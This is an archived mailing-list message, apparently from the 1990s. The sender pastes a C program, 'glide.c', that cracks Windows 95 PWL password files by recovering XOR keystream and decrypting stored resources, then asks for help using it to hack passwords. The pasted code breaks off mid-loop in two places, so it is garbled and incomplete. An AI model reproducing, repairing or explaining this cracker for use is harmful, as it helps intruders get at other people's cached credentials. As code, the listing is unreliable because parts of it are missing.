[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

about hacking win95 passwords




hello,

	my name is david parkinson

i have taken a document of an ftp on how to hack win95 passwords

your email address was on it.  in the part where it says here is a 

guick hack and then this is what it shows

- --- glide.c ---

#include
#include

unsigned char Data[100001];
unsigned char keystream[1001];
int Rpoint[300];

main (int argc,char *argv[]) {
        FILE *fd;
        int     i,j,k;
        int     size;
        char ch;
        char *name;
        int cracked;
        int sizemask;
        int maxr;
        int rsz;
        int pos;
        int Rall[300]; /* resource allocation table */

        if (argc<2) {
                printf("usage: glide filename (username)");
                exit(1);
        }

        /* read PWL file */

        fd=fopen(argv[1],"rb");
        if(fd==NULL) {
                printf("can't open file %s",argv[2]);
                exit(1);
        }
        size=0;
        while(!feof(fd)) {
                Data[size++]=fgetc(fd);
        }
        size--;
        fclose(fd);

        /* find username */
        name=argv[1];
        if(argc>2) name=argv[2];
        printf("Username: %s\n",name);

        /* copy encrypted text into keystream */
        cracked=size-0x0208;
        if(cracked<0) cracked=0;
        if(cracked>1000) cracked=1000;
        memcpy(keystream,Data+0x208,cracked );

        /* generate 20 bytes of keystream */
        for(i=0;i<20;i++) {
                ch=toupper(name[i]);
                if(ch==0) break;
                if(ch=='.') break;
                keystream[i]^=ch;
        };
        cracked=20;

        /* find allocated resources */

        sizemask=keystream[0]+(keystream[1]<<8);
        printf("Sizemask: %04X\n",sizemask);

        for(i=0;i<256;i++) Rall[i]=0;

        maxr=0;
        for(i=0x108;i<0x208;i++) {
                if(Data[i]!=0xff) {
                        Rall[Data[i]]++;
                        if (Data[i]>maxr) maxr=Data[i];
                }
        }
        maxr=(((maxr/16)+1)*16);        /* resource pointer table size
appears to be divisible by 16 */

        /* search after resources */

        Rpoint[0]=0x0208+2*maxr+20+2;   /* first resource */
        for(i=0;i> 8) & 0x00ff;
        }
        cracked+=maxr*2+2;

        printf("%d bytes of keystream recovered\n",cracked);

        /* decrypt resources */
        for(i=0;i < maxr;i++) {
                rsz=Rpoint[i+1]-Rpoint[i];
                if (rsz>cracked) rsz=cracked;
                printf("Resource[%d] (%d)\n",i,rsz);
                for(j=0;j
E3D2BCADBEF8C82F A5891D2B6730EA1B PGPencrypted mail preferred, finger
for key

------- end -------


i have no idea what that means and how it can help me hack win95 

passwords.

if u could help we with this it would be greatly appreciated


-david parkinson-

aka: the phantom